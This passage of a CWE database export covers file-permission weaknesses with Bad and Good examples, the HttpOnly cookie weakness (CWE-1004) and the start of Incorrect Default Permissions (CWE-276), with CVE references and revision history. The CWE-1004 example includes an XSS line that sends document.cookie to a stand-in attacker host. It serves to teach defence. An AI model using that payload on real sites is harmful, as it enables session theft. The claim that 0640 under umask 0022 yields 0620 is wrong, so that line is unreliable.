"BodyText": "os.Create will create a file with 0666 permissions before umask if the specified file does not exist. A typical umask of 0022 would result in the file having 0644 permissions. That is, the file would have world-writable and world-readable permissions.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": "In this scenario, it is advised to use the more customizable method of os.OpenFile with the os.O_WRONLY and os.O_CREATE flags specifying 0640 permissions to create the admin file.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": "This is because on a typical system where the umask is 0022, the perm 0640 applied in os.OpenFile will result in a file of 0620 where only the owner and group can write.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
}
],
"ID": null
},
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "The following command recursively sets world-readable permissions for a directory and all of its children:",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\tchmod -R ugo+r DIRNAME\n```",
"IntroText": null,
"Language": "Shell",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "If this command is run from a program, the person calling the program might not expect that all the files under the directory will be world-readable. If the directory is expected to contain private data, this could become a security problem.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
}
],
"ID": null
},
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "The following Azure command updates the settings for a storage account:",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\taz storage account update --name <storage-account> --resource-group <resource-group> --allow-blob-public-access true\n```",
"IntroText": null,
"Language": "Shell",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "However, \"Allow Blob Public Access\" is set to true, meaning that anonymous/public users can access blobs.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": "The command could be modified to disable \"Allow Blob Public Access\" by setting it to false.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\taz storage account update --name <storage-account> --resource-group <resource-group> --allow-blob-public-access false\n```",
"IntroText": null,
"Language": "Shell",
"Nature": "Good",
"Reference": null
}
],
"ID": "DX-160"
},
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "The following Google Cloud Storage command gets the settings for a storage account named 'BUCKET_NAME':",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\t gsutil iam get gs://BUCKET_NAME\n```",
"IntroText": null,
"Language": "Shell",
"Nature": "Informative",
"Reference": null
},
{
"BodyText": "Suppose the command returns the following result:",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "{\n\n```\n\t \"bindings\":[{\n\t\t \"members\":[\n\t\t\t \"projectEditor: PROJECT-ID\",\n\t\t\t \"projectOwner: PROJECT-ID\" \n\t\t ],\n\t\t \"role\":\"roles/storage.legacyBucketOwner\"\n\t },\n\t {\n\t\t \"members\":[ \n\t\t\t \"allUsers\",\n\t\t\t \"projectViewer: PROJECT-ID\"\n\t\t\t ],\n\t\t\t \"role\":\"roles/storage.legacyBucketReader\"\n\t\t }\n\t ]\n }\n```",
"IntroText": null,
"Language": "JSON",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "This result includes the \"allUsers\" or IAM role added as members, causing this policy configuration to allow public access to cloud storage resources. There would be a similar concern if \"allAuthenticatedUsers\" was present.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": "The command could be modified to remove \"allUsers\" and/or \"allAuthenticatedUsers\" as follows:",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "gsutil iam ch -d allUsers gs://BUCKET_NAME\n gsutil iam ch -d allAuthenticatedUsers gs://BUCKET_NAME",
"IntroText": null,
"Language": "Shell",
"Nature": "Good",
"Reference": null
}
],
"ID": "DX-161"
}
] | null | null |
High
| null | 2
|
[
[
"284",
"285",
"732"
],
[
"664",
"668",
"732"
]
] |
[
"1004",
"276",
"277",
"278",
"279",
"281",
"766"
] |
1004
|
Sensitive Cookie Without 'HttpOnly' Flag
|
Variant
|
Simple
|
Incomplete
|
The product uses a cookie to store sensitive information, but the cookie is not marked with the HttpOnly flag.
|
The HttpOnly flag directs compatible browsers to prevent client-side script from accessing cookies. Including the HttpOnly flag in the Set-Cookie HTTP response header helps mitigate the risk associated with Cross-Site Scripting (XSS) where an attacker's script code might attempt to read the contents of a cookie and exfiltrate information obtained. When set, browsers that support the flag will not reveal the contents of the cookie to a third party via client-side script executed via XSS.
|
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
},
{
"Class": "Web Based",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Technology"
}
] | null |
[
{
"Note": null,
"Phase": "Implementation"
}
] |
[
{
"Impact": [
"Read Application Data"
],
"Likelihood": null,
"Note": "If the HttpOnly flag is not set, then sensitive information stored in the cookie may be exposed to unintended parties.",
"Scope": [
"Confidentiality"
]
},
{
"Impact": [
"Gain Privileges or Assume Identity"
],
"Likelihood": null,
"Note": "If the cookie in question is an authentication cookie, then not setting the HttpOnly flag may allow an adversary to steal authentication data (e.g., a session ID) and assume the identity of the user.",
"Scope": [
"Integrity"
]
}
] |
[
{
"Description": "Leverage the HttpOnly flag when setting a sensitive cookie in a response.",
"Effectiveness": "High",
"EffectivenessNotes": "While this mitigation is effective for protecting cookies from a browser's own scripting engine, third-party components or plugins may have their own engines that allow access to cookies. Attackers might also be able to use XMLHTTPResponse to read the headers directly and obtain the cookie.",
"MitigationID": null,
"Phase": [
"Implementation"
],
"Strategy": null
}
] |
[
{
"Description": "Web application for a room automation system has client-side Javascript that sets a sensitive cookie without the HTTPOnly security attribute, allowing the cookie to be accessed.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2022-24045",
"Reference": "CVE-2022-24045"
},
{
"Description": "CMS written in Python does not include the HTTPOnly flag in a Set-Cookie header, allowing remote attackers to obtain potentially sensitive information via script access to this cookie.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2014-3852",
"Reference": "CVE-2014-3852"
},
{
"Description": "Appliance for managing encrypted communications does not use HttpOnly flag.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2015-4138",
"Reference": "CVE-2015-4138"
}
] | null | null | null |
[
{
"Authors": [
"OWASP"
],
"Edition": null,
"ExternalReferenceID": "REF-2",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": null,
"Publisher": null,
"Section": null,
"Title": "HttpOnly",
"URL": "https://owasp.org/www-community/HttpOnly",
"URLDate": "2023-04-07"
},
{
"Authors": [
"Michael Howard"
],
"Edition": null,
"ExternalReferenceID": "REF-3",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": "2002",
"Publisher": null,
"Section": null,
"Title": "Some Bad News and Some Good News",
"URL": "https://learn.microsoft.com/en-us/previous-versions/ms972826(v=msdn.10)?redirectedfrom=MSDN",
"URLDate": "2023-04-07"
},
{
"Authors": [
"Troy Hunt"
],
"Edition": null,
"ExternalReferenceID": "REF-4",
"Publication": null,
"PublicationDay": "26",
"PublicationMonth": "03",
"PublicationYear": "2013",
"Publisher": null,
"Section": null,
"Title": "C is for cookie, H is for hacker - understanding HTTP only and Secure cookies",
"URL": "https://www.troyhunt.com/c-is-for-cookie-h-is-for-hacker/",
"URLDate": null
},
{
"Authors": [
"Microsoft"
],
"Edition": null,
"ExternalReferenceID": "REF-5",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": null,
"Publisher": null,
"Section": null,
"Title": "Mitigating Cross-site Scripting With HTTP-only Cookies",
"URL": "https://learn.microsoft.com/en-us/previous-versions//ms533046(v=vs.85)?redirectedfrom=MSDN",
"URLDate": "2023-04-07"
}
] | null |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2017-01-02",
"SubmissionName": "CWE Content Team",
"SubmissionOrganization": "MITRE",
"SubmissionReleaseDate": "2017-01-19",
"SubmissionVersion": "2.10",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms, References, Relationships",
"ModificationDate": "2017-11-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms, Relationships",
"ModificationDate": "2020-02-24",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2021-10-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description",
"ModificationDate": "2023-01-31",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Detection_Factors, References, Relationships, Time_of_Introduction",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Observed_Examples",
"ModificationDate": "2023-10-26",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "732",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] | null |
[
{
"Description": "Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect \"sources\" (origins of input) with \"sinks\" (destinations where the data interacts with external components, a lower layer such as the OS, etc.)",
"DetectionMethodID": "DM-14",
"Effectiveness": "High",
"EffectivenessNotes": null,
"Method": "Automated Static Analysis"
}
] |
[
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "In this example, a cookie is used to store a session ID for a client's interaction with a website. The intention is that the cookie will be sent to the website with each request made by the client.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": "The snippet of code below establishes a new cookie to hold the sessionID.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\tString sessionID = generateSessionId();\n\tCookie c = new Cookie(\"session_id\", sessionID);\n\tresponse.addCookie(c);\n```",
"IntroText": null,
"Language": "Java",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "The HttpOnly flag is not set for the cookie. An attacker who can perform XSS could insert malicious script such as:",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\tdocument.write('<img src=\"http://attacker.example.com/collect-cookies?cookie=' + document.cookie . '\">'\n```",
"IntroText": null,
"Language": "JavaScript",
"Nature": "Attack",
"Reference": null
},
{
"BodyText": "When the client loads and executes this script, it makes a request to the attacker-controlled web site. The attacker can then log the request and steal the cookie.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": "To mitigate the risk, use the setHttpOnly(true) method.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\tString sessionID = generateSessionId();\n\tCookie c = new Cookie(\"session_id\", sessionID);\n\tc.setHttpOnly(true);\n\tresponse.addCookie(c);\n```",
"IntroText": null,
"Language": "Java",
"Nature": "Good",
"Reference": null
}
],
"ID": null
}
] | null | null |
Medium
|
[
"An HTTP cookie is a small piece of data attributed to a specific website and stored on the user's computer by the user's web browser. This data can be leveraged for a variety of purposes including saving information entered into form fields, recording user activity, and for authentication purposes. Cookies used to save or record information generated by the user are accessed and modified by script code embedded in a web page. While cookies used for authentication are created by the website's server and sent to the user to be attached to future requests. These authentication cookies are often not meant to be accessed by the web page sent to the user, and are instead just supposed to be attached to future requests to verify authentication details."
] | 2
|
[
[
"284",
"285",
"732",
"1004"
],
[
"664",
"668",
"732",
"1004"
]
] |
[] |
276
|
Incorrect Default Permissions
|
Base
|
Simple
|
Draft
|
During installation, installed file permissions are set to allow anyone to modify those files.
| null |
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
},
{
"Class": "Not Technology-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Technology"
},
{
"Class": "ICS/OT",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Technology"
}
] | null |
[
{
"Note": null,
"Phase": "Architecture and Design"
},
{
"Note": null,
"Phase": "Implementation"
},
{
"Note": null,
"Phase": "Installation"
},
{
"Note": null,
"Phase": "Operation"
}
] |
[
{
"Impact": [
"Read Application Data",
"Modify Application Data"
],
"Likelihood": null,
"Note": null,
"Scope": [
"Confidentiality",
"Integrity"
]
}
] |
[
{
"Description": "The architecture needs to access and modification attributes for files to only those users who actually require those actions.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": "MIT-1",
"Phase": [
"Architecture and Design",
"Operation"
],
"Strategy": null
},
{
"Description": "\n\nCompartmentalize the system to have \"safe\" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.\n\n\nEnsure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges.\n",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": "MIT-46",
"Phase": [
"Architecture and Design"
],
"Strategy": "Separation of Privilege"
}
] |
[
{
"Description": "Executables installed world-writable.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2005-1941",
"Reference": "CVE-2005-1941"
},
{
"Description": "Home directories installed world-readable.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2002-1713",
"Reference": "CVE-2002-1713"
},
{
"Description": "World-writable log files allow information loss; world-readable file has cleartext passwords.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2001-1550",
"Reference": "CVE-2001-1550"
},
{
"Description": "World-readable directory.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2002-1711",
"Reference": "CVE-2002-1711"
},
{
"Description": "Windows product uses insecure permissions when installing on Solaris (genesis: port error).",
"Link": "https://www.cve.org/CVERecord?id=CVE-2002-1844",
"Reference": "CVE-2002-1844"
},
{
"Description": "Insecure permissions for a shared secret key file. Overlaps cryptographic problem.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2001-0497",
"Reference": "CVE-2001-0497"
},
{
"Description": "Default permissions of a device allow IP spoofing.",
"Link": "https://www.cve.org/CVERecord?id=CVE-1999-0426",
"Reference": "CVE-1999-0426"
}
] | null |
[
{
"EntryID": null,
"EntryName": "Insecure Default Permissions",
"MappingFit": null,
"TaxonomyName": "PLOVER"
},
{
"EntryID": "FIO06-C",
"EntryName": "Create files with appropriate access permissions",
"MappingFit": null,
"TaxonomyName": "CERT C Secure Coding"
},
{
"EntryID": "FIO01-J",
"EntryName": "Create files with appropriate access permission",
"MappingFit": null,
"TaxonomyName": "The CERT Oracle Secure Coding Standard for Java (2011)"
},
{
"EntryID": "Part 2-4",
"EntryName": "Req SP.03.08",
"MappingFit": null,
"TaxonomyName": "ISA/IEC 62443"
},
{
"EntryID": "Part 4-2",
"EntryName": "Req CR 2.1",
"MappingFit": null,
"TaxonomyName": "ISA/IEC 62443"
}
] |
[
"1",
"127",
"81"
] |
[
{
"Authors": [
"Mark Dowd",
"John McDonald",
"Justin Schuh"
],
"Edition": "1st Edition",
"ExternalReferenceID": "REF-62",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": "2006",
"Publisher": "Addison Wesley",
"Section": "Chapter 3, \"Insecure Defaults\", Page 69",
"Title": "The Art of Software Security Assessment",
"URL": null,
"URLDate": null
}
] | null |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2006-07-19",
"SubmissionName": "PLOVER",
"SubmissionOrganization": null,
"SubmissionReleaseDate": "2006-07-19",
"SubmissionVersion": "Draft 3",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Time_of_Introduction",
"ModificationDate": "2008-07-01",
"ModificationName": "Eric Dalci",
"ModificationOrganization": "Cigital",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships, Taxonomy_Mappings, Weakness_Ordinalities",
"ModificationDate": "2008-09-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships, Taxonomy_Mappings",
"ModificationDate": "2008-11-24",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description, Name",
"ModificationDate": "2009-05-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences, Relationships, Taxonomy_Mappings",
"ModificationDate": "2011-06-01",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships, Taxonomy_Mappings",
"ModificationDate": "2011-09-13",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings",
"ModificationDate": "2012-05-11",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations",
"ModificationDate": "2012-10-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Detection_Factors, Relationships",
"ModificationDate": "2014-07-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Related_Attack_Patterns",
"ModificationDate": "2017-05-03",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms, Causal_Nature, Modes_of_Introduction, Relationships, Taxonomy_Mappings",
"ModificationDate": "2017-11-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships, Taxonomy_Mappings",
"ModificationDate": "2019-01-03",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships, Type",
"ModificationDate": "2019-06-20",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms, Description, Detection_Factors, Relationships",
"ModificationDate": "2020-02-24",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description, Modes_of_Introduction, Potential_Mitigations",
"ModificationDate": "2020-08-20",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations",
